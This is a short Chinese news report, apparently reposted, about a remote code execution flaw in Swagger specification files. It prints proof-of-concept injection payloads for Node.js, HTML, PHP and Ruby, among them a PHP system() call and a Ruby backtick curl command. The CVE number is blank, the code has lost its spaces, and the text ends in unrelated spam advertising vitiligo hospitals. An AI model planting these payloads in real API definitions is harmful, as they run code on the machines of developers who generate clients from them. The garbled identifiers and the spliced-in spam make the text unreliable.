Swagger规格被广泛的使用在Html、PHP、Java和Ruby等流行语言开发的应用中,其最近被曝出远程代码执行漏洞,潜在影响到了Java、PHP、NodeJS和Ruby等流行语言开发的应用。这个漏洞的CVE编号为CVE--。该漏洞属于参数注入漏洞,能够在SwaggerJSON文件中嵌入恶意代码。如凡是使用SwaggerAPI的应用程序都会受到影响。Rapid7社区的安全研究人员目前公开了该漏洞的技术细节和修补方案。
EXPJavaScript(node)“paths”:{
”/a’);};};returnexports;}));console.log(‘RCE’);(function(){}(this,function(){a=function(){b=function(){newArray(‘”:{
html“info”:{“description”:“scriptalert(1)/script”,
PHP“definitions”:{
”d”:{
“type”:“object”,
“description”:“*/echosystem(chr(0x6c).chr(0×73));/*”,
ruby“info”:{
”description”:“=begin”,
”title”:“=end`curl-XPOST-d\”fizz=buzz\”西安最好的白癜风医院昆明治疗白癜风医院